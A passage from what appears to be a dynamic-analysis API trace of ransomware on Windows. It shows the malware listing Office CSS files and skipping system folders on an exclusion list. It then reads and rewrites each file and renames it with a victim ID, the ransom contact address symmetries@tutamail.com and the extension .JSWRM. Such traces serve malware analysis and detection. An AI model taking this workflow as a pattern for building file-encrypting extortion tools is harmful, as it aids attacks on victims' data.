lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1da60, lpOverlapped=0x0) returned 1 [0118.243] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.243] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1da60, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1da60, lpOverlapped=0x0) returned 1 [0118.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0118.243] CloseHandle (hObject=0x314) returned 1 [0118.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0118.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0118.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0118.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0118.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0118.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0118.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0118.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0118.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0118.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0118.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0118.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0118.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0118.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0118.244] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME49.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme49.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME49.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme49.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0118.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0118.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0118.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0118.245] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xacf29e7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xacf29e7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xacf29e7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f018, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME50.CSS", cAlternateFileName="")) returned 1 [0118.245] lstrcmpiW (lpString1="SCHEME50.CSS", lpString2=".") returned 1 [0118.245] lstrcmpiW (lpString1="SCHEME50.CSS", lpString2="..") returned 1 [0118.245] lstrcmpiW (lpString1="SCHEME50.CSS", lpString2="...") returned 1 [0118.245] lstrcmpiW (lpString1="SCHEME50.CSS", lpString2="windows") returned -1 [0118.245] lstrcmpiW (lpString1="SCHEME50.CSS", lpString2="recovery") returned 1 [0118.245] lstrcmpiW (lpString1="SCHEME50.CSS", lpString2="perflogs") returned 1 [0118.245] lstrcmpiW (lpString1="SCHEME50.CSS", lpString2="documents and settings") returned 1 [0118.245] lstrcmpiW (lpString1="SCHEME50.CSS", lpString2="$RECYCLE.BIN") returned 1 [0118.245] lstrcmpiW (lpString1="SCHEME50.CSS", lpString2="system volume information") returned -1 [0118.245] lstrcmpiW (lpString1="SCHEME50.CSS", lpString2="msocache") returned 1 [0118.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0118.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME50.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME50.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME50.CSS", lpUsedDefaultChar=0x0) returned 12 [0118.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0118.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0118.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME50.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME50.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME50.CSS", lpUsedDefaultChar=0x0) returned 12 [0118.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0118.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0118.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0118.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0118.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0118.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0118.245] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME50.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme50.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0118.246] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=127000) returned 1 [0118.246] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f010) returned 0x24c1d0 [0118.246] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1f010, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1f010, lpOverlapped=0x0) returned 1 [0118.275] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.275] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1f010, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1f010, lpOverlapped=0x0) returned 1 [0118.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0118.276] CloseHandle (hObject=0x314) returned 1 [0118.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0118.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0118.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0118.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0118.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0118.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0118.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0118.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0118.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0118.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0118.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0118.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0118.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0118.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0118.276] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME50.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme50.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME50.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme50.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0118.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0118.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0118.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0118.277] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xacf29e7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xacf29e7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xacf29e7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1df68, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME51.CSS", cAlternateFileName="")) returned 1 [0118.277] lstrcmpiW (lpString1="SCHEME51.CSS", lpString2=".") returned 1 [0118.277] lstrcmpiW (lpString1="SCHEME51.CSS", lpString2="..") returned 1 [0118.277] lstrcmpiW (lpString1="SCHEME51.CSS", lpString2="...") returned 1 [0118.277] lstrcmpiW (lpString1="SCHEME51.CSS", lpString2="windows") returned -1 [0118.277] lstrcmpiW (lpString1="SCHEME51.CSS", lpString2="recovery") returned 1 [0118.277] lstrcmpiW (lpString1="SCHEME51.CSS", lpString2="perflogs") returned 1 [0118.277] lstrcmpiW (lpString1="SCHEME51.CSS", lpString2="documents and settings") returned 1 [0118.277] lstrcmpiW (lpString1="SCHEME51.CSS", lpString2="$RECYCLE.BIN") returned 1 [0118.277] lstrcmpiW (lpString1="SCHEME51.CSS", lpString2="system volume information") returned -1 [0118.277] lstrcmpiW (lpString1="SCHEME51.CSS", lpString2="msocache") returned 1 [0118.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0118.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME51.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME51.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME51.CSS", lpUsedDefaultChar=0x0) returned 12 [0118.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0118.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0118.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME51.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME51.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME51.CSS", lpUsedDefaultChar=0x0) returned 12 [0118.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0118.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0118.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0118.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0118.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0118.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0118.278] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME51.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme51.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0118.278] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=122728) returned 1 [0118.278] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1df60) returned 0x24c1d0 [0118.279] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1df60, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1df60, lpOverlapped=0x0) returned 1 [0118.370] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.370] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1df60, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1df60, lpOverlapped=0x0) returned 1 [0118.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0118.383] CloseHandle (hObject=0x314) returned 1 [0118.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0118.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0118.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0118.384] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0118.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0118.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0118.384] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0118.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0118.384] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0118.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0118.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0118.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0118.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0118.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0118.384] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME51.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme51.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME51.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme51.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0118.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0118.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0118.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0118.385] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xacf29e7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xacf29e7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad18c6e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e254, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME52.CSS", cAlternateFileName="")) returned 1 [0118.386] lstrcmpiW (lpString1="SCHEME52.CSS", lpString2=".") returned 1 [0118.386] lstrcmpiW (lpString1="SCHEME52.CSS", lpString2="..") returned 1 [0118.386] lstrcmpiW (lpString1="SCHEME52.CSS", lpString2="...") returned 1 [0118.386] lstrcmpiW (lpString1="SCHEME52.CSS", lpString2="windows") returned -1 [0118.386] lstrcmpiW (lpString1="SCHEME52.CSS", lpString2="recovery") returned 1 [0118.386] lstrcmpiW (lpString1="SCHEME52.CSS", lpString2="perflogs") returned 1 [0118.386] lstrcmpiW (lpString1="SCHEME52.CSS", lpString2="documents and settings") returned 1 [0118.386] lstrcmpiW (lpString1="SCHEME52.CSS", lpString2="$RECYCLE.BIN") returned 1 [0118.386] lstrcmpiW (lpString1="SCHEME52.CSS", lpString2="system volume information") returned -1 [0118.386] lstrcmpiW (lpString1="SCHEME52.CSS", lpString2="msocache") returned 1 [0118.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0118.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME52.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME52.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME52.CSS", lpUsedDefaultChar=0x0) returned 12 [0118.386] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0118.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0118.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME52.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME52.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME52.CSS", lpUsedDefaultChar=0x0) returned 12 [0118.386] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0118.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0118.386] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0118.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0118.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0118.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0118.386] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME52.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme52.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0118.387] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=123476) returned 1 [0118.387] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1e250) returned 0x24c1d0 [0118.387] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1e250, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1e250, lpOverlapped=0x0) returned 1 [0118.396] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.396] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1e250, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1e250, lpOverlapped=0x0) returned 1 [0118.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0118.396] CloseHandle (hObject=0x314) returned 1 [0118.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0118.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0118.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0118.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0118.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0118.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0118.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0118.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0118.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 